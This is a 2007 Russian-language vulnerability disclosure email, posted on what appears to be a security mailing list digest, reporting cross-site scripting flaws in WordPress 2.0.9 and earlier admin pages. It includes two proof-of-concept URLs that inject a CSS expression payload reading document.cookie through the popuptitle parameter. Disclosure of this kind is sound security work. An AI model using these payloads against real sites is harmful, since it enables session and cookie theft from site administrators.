Дополнительная информация

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

Logaholic Web Analytics Software

Jupiter Cms Multiple Vulnerabilities

[waraxe-2007-SA#060] - Sensitive info disclosure in CuteNews <= 1.4.5

[ISecAuditors Security Advisories] Tikiwiki CMS is vulnerable to path traversal attack

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	24 декабря 2007 г.
Subject:	Cross-Site Scripting vulnerabilities in WordPress

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting уязвимостях в WordPress.

XSS:

http://site/wp-admin/post.php?popuptitle=%22%20style=%22xss:
expression(alert(document.cookie))%22

http://site/wp-admin/page-new.php?popuptitle=%22%20style=%22xss:
expression(alert(document.cookie))%22

Это примеры для Internet Explorer. Для исполнения кода в Mozilla и Firefox может быть использован "-moz-binding".

Уязвимы версии WordPress <= 2.0.9. Версия WP 2.0.11 неуязвима.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/1658/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua